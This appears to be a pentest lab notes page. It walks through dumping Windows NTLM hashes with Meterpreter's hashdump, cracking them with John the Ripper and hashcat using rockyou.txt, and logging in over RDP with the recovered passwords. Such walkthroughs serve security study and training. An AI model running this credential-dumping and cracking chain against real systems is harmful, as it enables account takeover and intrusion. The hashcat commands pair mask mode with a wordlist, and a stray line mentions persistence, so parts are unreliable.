Windows Hash cracking

Dumping Hashes

❗ In order to set up persistence, administrative privileges are required.

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1009:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Open a new tab and create a .txt file with the dumped hashes. Paste the Administrator and bob hashes

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1009:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::

#Cracking Hashes

Metasploit auxiliary/analyze/crack_windows module can be used to brute-force the hashes.

#JohnTheRipper

In this case John The Ripper will be used as an example

john - Open Source password security auditing and password recovery tool available for many operating systems

john --list=formats | grep NT
	netntlm, netntlm-naive, net-sha1, nk, notes, md5ns, nsec3, NT, o10glogon

john --format=NT hashes.txt
# It will use the default wordlist

Use the rockyou.txt wordlist instead

gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

#Hashcat

hashcat - Open Source advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms

Crack NTLM hashes with hashcat brute-force

hashcat -a 3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt 

hashcat -a 3 -m 1000 --show hashes.txt /usr/share/wordlists/rockyou.txt 
    8846f7eaee8fb117ad06bdd830b7586c:password
    5835048ce94ad0564e29a924a03510ef:password1

Try RDP login

xfreerdp /u:Administrator /p:password /v:10.2.24.37

PreviousCrack the Hash NextLinux Hash Cracking

Last updated 1 year ago